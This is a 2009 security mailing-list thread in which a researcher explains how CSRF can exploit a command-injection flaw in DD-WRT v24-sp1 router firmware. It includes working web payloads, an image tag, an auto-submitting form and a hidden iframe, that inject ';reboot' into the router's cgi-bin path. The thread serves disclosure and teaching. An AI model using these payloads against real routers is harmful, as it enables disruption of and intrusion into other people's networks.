I'm glad you approve, and thanks for letting us know about the exploit via the recent podcast. I don't follow the latest vulnerability as well as I should.
Adrian On Sat, Jul 25, 2009 at 8:59 PM, Carlos Perez <[email protected] > wrote: > Only thing I can say You ROCK!!!!!' dude > > Sent from my iPhone > > On Jul 25, 2009, at 5:35 PM, Adrian Crenshaw <[email protected]> > wrote: > > I heard Carlos talk about it, so I started to work on a writeup, which I'll > post to my site shortly.* Carlos, thanks for the idea. > * > > I was interested in giving a reall world example of a CSRF attack, > similar to the ones I mentioned in my OWASP Top 5 > video<http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville>, > and maybe use it against a piece of internal equipment that is behind a NAT > box. Then I heard about Carlos Perez > write-up<http://www.darkoperator.com/blog/2009/7/21/using-metasploit-dd-wrt-exploit-module-thru-pivot.html>on > using Metasploit against a vulnerability in the DD-WRT v24-sp1 firmware. > I thought this would be a great way to demo the concept of using CSRF/XSS > against hardware behind a NAT, especially since I've done a video on > installing DD-WRT > before<http://www.irongeek.com/i.php?page=videos/intro-to-dd-wrt-mod-your-wireless-router-to-do-more>. > Some people thing it's not a big deal since the attack request has to come > from an internal source, but they don't think about the fact that CSRF can > make the attack come from an internal source. Granted, this may not be > considered a true CSRF from the stand point that you don't have to have > authenticated against your DD-WRT v24-sp1 router, but it works much the same > way. Carlos' demo shows using Metasplot to open a shell on the router, then > do some other messing around, I'll just show how this vulnerability could be > used to reboot the router just using html (there are far more deviant things > you could do). For the most part this attack essentially amounts to pointing > the browser at <http://ip-of-router/cgi-bin/>http://ip-of-router/cgi-bin/* > ;*some-command . Since the default IP for most home NAT routers is > 192.168.1.1, this is a pretty easy attack that could be pulled off against > people who browse a page that the attacker controls. The attacker would not > have to explicitly have the victim go to <http://ip-of-router/cgi-bin/> > http://ip-of-router/cgi-bin/*;*some-command to pull off the attack, there > are plenty of ways to make a browser automatically make the reques, for > example: > * * > > *IMG get:* > <img src=*" <http://192.168.1.1/cgi-bin/;reboot> > http://192.168.1.1/cgi-bin/;reboot"*> > * * > > *Post method:* > <form name=*"csrfform"* method=*"post"* > action=*"<http://192.168.1.1/cgi-bin/;reboot> > http://192.168.1.1/cgi-bin/;reboot"*>* *<input type=*'hidden'* name=* > 'input_from_form'* value=*"Test of of auto submitted form."*>* *</form>* * > <script> document.csrfform.submit*()* </script>* * > > *IFRAME Get:* > <iframe src=*" <http://192.168.1.1/cgi-bin/;reboot> > http://192.168.1.1/cgi-bin/;reboot"* style=*"width:0px; height:0px; > border: 0px"*></iframe> > > If you would like to test this code against your DD-WRT v24-sp1 click the > link below: > DD-WRT test page, only click if you want your router to > reboot<http://www.irongeek.com/security/ddwrttest-only-click-if-you-want-your-router-to-reboot.htm> > > For information on the fix: > <http://www.dd-wrt.com/>http://www.dd-wrt.com > > Guess its time to patch. > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: <http://pauldotcom.com>http://pauldotcom.com > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
